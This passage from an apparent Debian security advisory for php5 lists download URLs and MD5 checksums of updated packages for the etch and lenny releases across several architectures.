http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 64858 4e5c2a00ee49040841b3646c119438c9\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 12246 fb358b972aecb710bca7b2a2cb631445\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 33524 875c9a5c173b088710bb2c56963093bf\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 44374 07a7d24fe9310d7bd263cd4d44f43059\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 2339884 5643ab1279e6412aca57bee3f30a3c70\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 4762 a533020de317f5fd4b314c52dfbed2f4\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 5038 b1cf04e50a8377be0e303b46a63f54ea\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 12816 02d756a05b3f14f1fde896d6d824633d\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 216260 ef7c751d89f5eaedcb53037b2fe12705\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 36448 880d6ac9a57f777d474a2e0473c6ca8d\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 18388 ea5ff2538f81ecf98b4cec6e94d94698\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 8618 3078e90c875e6ed3f5baf1423e259b69\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 17230 e426661709b814cfd860f920f6994792\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 2325162 61c4b2b50e07c2a39276945f79bd4b9f\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 34542 bd0d1be2d82bbd7834212fa305edc61f\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 6259582 3d5375c501a26ad6ea4dea0448c00af9\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 3198244 f77bd7b0b646f31738c78819be8922af\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 50650 16f80c37b82b26497e15a2b32522284e\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 236650 8165e88c029aa383c2de8e93c82392c6\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 15436 37b2eb669995db49e672cd23a8e5d843\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 342166 61a661798785c7ae7bb2c11aea8c1a9d\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 76618 9cb83c4bc231bade7184e0ee70486968\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 12012 4bf71b184f6e1c705690baa4cdbde35e\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 6502 3667f95d6ad22016857553df793fe272\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 3199296 1c72d0431f744e4c3c5f48772274b0c1\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 95634 dfdc9e95298840bc92f651c95adecf27\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 24866 a434bf6a52ad51913f2f12134c627ac7\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 25088 9cfb6b47f74723dfd90db2439ef30b2e\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 27146 da115f332ad5629536ea3048f9d9c6cc\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 34408 5dc989369358752ae96d6aa0091886e5\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 54518 c63fa927d47be4ac27a090efc90245fd\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 48404 761b87efe93f3436127f585c7967e5e3\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 3151862 23ebf641671d07e52fe39a9ce95386ba\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 6150 83e8d323f342ee99bcbe7ef152671c78\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 54674 f3ab55e33d7b2b11ebd902fd5c051faa\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 17770 ba86313dd68a72319ad8a68dd0a8a6b5\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 17554 e12e126bb529e29d9b10b374db9de59c\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_ia64.deb\n Size/MD5 checksum: 50242 e5767c446ae9a72b46a678f89f4a8a26\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 5250 2adcdd4cf4b9ad0ab5505455c0669c0e\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 4908 7b0e17a304d90cbc8d8fae662ef92b20\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 35600 f061d038844877e045431adfc1217402\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 17316 24657b31ff82a1a27151395b28b432d5\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 31610 2deca61c78a278b2bbe9b9baeb039fa5\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 12222 4586d11c610f15bc88f7bc1e0bbec344\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 11350 05005a3f93ab1737bbd752432381fd39\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 2414744 fe305917ab4c5157bff749de8d643f93\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 2388420 d1f897a8b8bd63924a01a7de1777aba6\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 63876 a71f64d866732b19a2b2ec79e44f8fbd\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 15732 c7772b1c4e7aebf0ca832feaba178377\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 8280 47dce2b991a5658b06126386050db44b\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 33182 ae8f2414e988be684bc30dc10695a9f6\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 4736866 5c06712f122aa5f8a4b6992033a44ba6\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 2414240 8a0d0eeb3ecfa24b9bd40033862eee7f\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 32766 16b20c8fcc252883b4dc35d2ff284e55\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 12470 57b8c232fbc6deff7319607fe81487c6\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 18504 c37b2ffc3de93308d180a99e7b992a85\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 23356 2bbfb3c09797542afa52df7f6add0163\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 49508 2aad97731fe8768344d22e81299bb2db\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 35260 8997d142d3e05a91cfb7bbd91eb4792f\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 345428 93df600fdcdc87ba609c6a8da5ddd9b2\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_mips.deb\n Size/MD5 checksum: 218086 d151a6431b9673cd261d2466e28ec683\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 33096 bac9fcdde64fa312553a981edcf4bc25\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 8206 4f173f5c397825c2f013e6767213de59\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 4688168 466cb837e25d88ebcb9e1f39b96c7a9f\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 17256 fa6c6d2b04723abd97ca07b6492b6faf\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 31556 dbcf00dcfe9ced18c7ba1c376d5d48cf\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 32300 179ad76c714800b3ed25a42d3571fb50\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 2370122 3841febdc489245d3e98816961df6c81\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 4900 fd5d441737f2993ab9ceff107303094f\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 12140 bf2ef1cdb56906f6e944f5ccb8d9d7ca\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 342238 e4453c6faba3421f48975a0f28b038fe\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 2361064 fae1aa64a85c1dd03a0f89cd37f38af8\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 23368 7410b76ed8935732fa513f52eeeadd18\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 35566 607f39063ac660f277e63929b973d2c0\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 18462 5df5661ab217cb34260d76cb95571cad\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 5234 efdf40378e9adfda2716820e66b28532\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 12430 99938c3c2b69d8544ef3597f4adfb21f\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 2369670 40b4242baf2106b18442b52d10277958\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 49446 123a361ca889ba182de99d715b40dfb5\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 11260 4786eb4877b948ea47ced84ab597c2b4\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 15648 380b6ecaf3adda197254e6076777faec\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 63420 01cde33df9dd5aa1dbb4d2860a2d552d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 34960 032bf522e8f4d650a9028b9ea5da0df6\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_mipsel.deb\n Size/MD5 checksum: 217366 0dbb1962a33193dadebfdbd411c92c16\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 6744 67259178bf49b2173acd17bee2b0cf0c\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 36002 ed7c290dab79a3d964f64a6dedfc602e\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 4752474 465a9ad1238796ae9fd6d336c1a42b22\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 2443108 c2526968e31ac17e254d0210dd022926\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 342292 6c73de3ca4c191544862aaa3771a37e3\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 37714 88c4d9f2faa2062b69e52a1c8553e005\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 220284 459907137ffb3be31443ed5abc3197bd\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 36480 a055a7d0507090b08be4ea25bb162feb\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 2393974 3c3ba2168e23ec8731397c2031c618e4\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 13756 477f4b7219c2a93fddd27b530058e050\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 18464 712dee6c962985ed08d4202a62c68886\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 19186 039739727c969ae6c25c348bd584f308\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 14748 195f6978bf4394c85ff29e6fa6e6b62e\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 26794 f6444569a73747e3af80ff9a29d1d83f\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 20248 f08b3c2c32dfa446597e2e547d369165\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 2442822 a5e8104d5220100ae63c2fa8be88ff1d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 38020 144dec220e3b04d64529366003e64160\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 70372 3df17ffe299b4f732a241eac4b4be86d\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 37104 a0a82ea304f529c99a01991ff433c258\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 6358 6cf2471c4684a7d8cdf442e47b6eecc6\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 10120 184db6b188224ddabd99e02b99d42656\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 12706 bf2487d7133fb20a786798ea966439d9\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 54070 7d4da5803bcec2b8687971d4f826f272\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 72606 bb53ebeb6d65b15005186f192b77332f\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 13440 9d20d8ec53d583b78af04c845716dea4\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 4894934 b445a7233feb1a8285dc4f87e46aa1d9\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 19578 77ddd8c5eedb176c19bb82edeb16c3d7\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 40520 f033a73a6c669beb1189b016d7210e42\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 39220 4c7dfb5a9a8eb13ba7ee5fdab08203c0\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 37180 a9760ec96826ef65daa6b9cb779d6e99\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 2536020 4559ac57af97f5988efa4570c77fb745\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 5472 83c382dacd87173219abc1a9543af799\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 18178 ee440d491a3d656d1d28ce203021cec7\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 37272 50f97cab1e56bfd5b129a934566a6447\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 2537052 5de9a94cebf414fe23d373f23221eaf8\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 222178 9fa9899c68f61293c3a83156fde47d6d\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 342138 2fe9217a1b163ccf6389c68fe64f1029\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 25034 501e91a5589aa6d7b4c5cb9a08c66528\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 9186 029a0c56c6192852104f25ce2502d364\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 2466010 c79086d9f7f8a4ccb94882b88de82f4e\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 11952 378f76c9ec6476bd364c755c826d194d\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 19324 253c859ad559f472a175f90ef39f85d7\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 36168 135fadc4f0170dc0e916e8ac07726caf\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 13392 e9caa124604abe127e3f8e26cce6285d\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 56348 f69f6d27de79f0319c379d2ee3e24b1c\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 5128 30ed87f0fa3cec857d61b4a81913c982\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 47972 6257d4cf3f47f1ed1d25931415bd2ba1\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 32608 1a8b314a54080ec3434594b2c3dc7a55\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 8276 b383dfabe124b614db8c4cb9e43e8ad7\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 33304 ccdcd515bba4b0af5018f4c0c47c48d5\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 11682 46820ee8d403abcab89012b399608acb\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 4874 fcdedd828dfeaad9b080013299a3c0f8\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 217762 fd9a30ba4d8229705db1f75c485dea44\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 34924 6757f07e78caf4a711aa8c59f6c1b5ab\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 4652 f25f72b067ae1a31b6e2aa1a451845ff\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 12632 5fcc1542c1d08b059fb660660575f4c1\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 24658 ff5ac84362babb6d566032efd1189676\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 61848 683a404b8e4bc0e1f8f077d03ac478d4\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 345116 9d302a8d9835e1eb69e58e0b4246b77c\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 16250 79ab057b5b3ec5618cc5864a6e4a4004\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 16586 71f02e0d46f51ddb3ed48c39bbac8d17\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 2334202 793e4680be0b5a56dd884842e3a3d27b\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 10770 f4e8b018c5494ef25ec7382a55e35abc\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 2282048 b8cf51abebd3d4a2d3a4c7aed6dc6f4b\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 31550 c6b59b4ce39133184358efdbf4adec78\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 33090 8e32de2c0c13526753b38b55162dedf5\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 2333728 6d0d0f21b1fb819efa89fab8c8a51d33\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 4526406 e38e3132025a9cdc16c08b4b29b8360d\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 17462 ebc3f06aafc04f49fb68adab118bbfe9\n\n\nDebian GNU/Linux 5.0 (stable) alias lenny\n- -----------------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny4.diff.gz\n Size/MD5 checksum: 164099 957d5e45ad5a1e96d92a864b29590e7b\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 12173741 b80fcee38363f031229368ceff8ced58\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny4.dsc\n Size/MD5 checksum: 2529 a437a2a7a18fd20140862ca43030f388\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.6.dfsg.1-1+lenny4_all.deb\n Size/MD5 checksum: 334532 14c1cefa63a25bc9d47f2b613c79a658\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny4_all.deb\n Size/MD5 checksum: 1080 285cecdbe24061cfa77e62f36ae78e99\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 39398 caa273c524b79c59672fbcae753a26ee\n 